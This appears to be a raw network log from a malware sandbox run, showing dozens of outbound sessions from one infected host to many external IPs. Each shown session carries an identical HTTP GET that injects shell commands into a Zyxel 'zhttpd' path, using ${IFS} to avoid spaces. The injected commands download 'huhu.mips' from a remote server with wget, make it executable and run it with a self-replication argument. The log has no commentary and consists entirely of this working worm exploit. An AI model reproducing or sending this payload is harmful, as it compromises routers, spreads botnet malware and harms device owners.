                                                  Jan 19, 2024 18:23:54.018281937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4009192.168.2.1355058161.179.14.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018323898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4010192.168.2.133969884.246.91.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018397093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4011192.168.2.133690461.74.176.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018465996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4012192.168.2.1335432124.57.80.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018531084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4013192.168.2.1334880190.16.210.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018569946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4014192.168.2.1353312147.251.84.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018625021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4015192.168.2.133659658.25.41.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018681049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4016192.168.2.134180274.13.0.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018738031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4017192.168.2.135961460.156.231.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018802881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4018192.168.2.1349730196.48.203.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018874884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4019192.168.2.1352970130.167.83.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018920898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4020192.168.2.134609473.200.59.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018970966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4021192.168.2.134338249.169.26.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019031048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4022192.168.2.135679266.2.56.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019088030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4023192.168.2.1352200196.172.9.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019143105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4024192.168.2.135226037.210.3.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019205093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4025192.168.2.1346736216.151.172.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019251108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4026192.168.2.135102866.226.95.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019293070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4027192.168.2.1360848209.175.237.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019332886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4028192.168.2.1335260196.194.134.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019385099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4029192.168.2.1337948186.151.138.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019426107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4030192.168.2.133321860.69.159.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019484043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4031192.168.2.1350694130.148.31.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019536972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4032192.168.2.1346532196.102.203.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019609928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4033192.168.2.134640089.47.60.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019634962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4034192.168.2.1344730211.178.164.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019712925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4035192.168.2.1337116114.214.68.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019762039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4036192.168.2.1342888163.107.199.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019800901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4037192.168.2.1338184178.22.164.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019859076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4038192.168.2.1337336199.142.81.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019901991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4039192.168.2.1351778209.54.46.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019941092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4040192.168.2.1343540153.96.9.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.019990921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4041192.168.2.1338752113.23.3.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020045042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4042192.168.2.134908696.34.79.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020101070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4043192.168.2.1360522202.113.59.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020163059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4044192.168.2.1346432219.85.38.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020214081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4045192.168.2.133369614.129.54.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020267010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4046192.168.2.133530696.118.19.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020313025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4047192.168.2.135500632.162.218.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020380974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4048192.168.2.1352676104.38.175.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020425081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4049192.168.2.13373422.120.215.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020490885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4050192.168.2.135431453.140.156.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020559072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4051192.168.2.1343266150.69.33.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020626068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4052192.168.2.133826045.44.32.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020678997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4053192.168.2.1343572158.127.222.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020737886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4054192.168.2.1350428103.247.205.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020790100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4055192.168.2.133365486.26.42.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020836115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4056192.168.2.136058889.158.202.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020879030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4057192.168.2.1352624198.205.201.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.020960093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4058192.168.2.1345168115.240.196.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021003962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4059192.168.2.1335864167.17.76.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021061897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4060192.168.2.133559696.130.230.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021099091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4061192.168.2.135415417.164.43.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021155119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4062192.168.2.134863268.85.197.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021202087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4063192.168.2.1343000197.94.3.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021240950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4064192.168.2.134247471.111.142.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021305084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4065192.168.2.134076076.187.164.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021362066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4066192.168.2.1350798118.38.138.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021424055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4067192.168.2.135455646.94.150.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021487951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4068192.168.2.1350270183.28.166.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021534920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4069192.168.2.1339788220.252.56.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021575928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4070192.168.2.134571851.41.197.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.021617889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4071192.168.2.134295819.184.132.115443
                                                  TimestampBytes transferredDirectionData
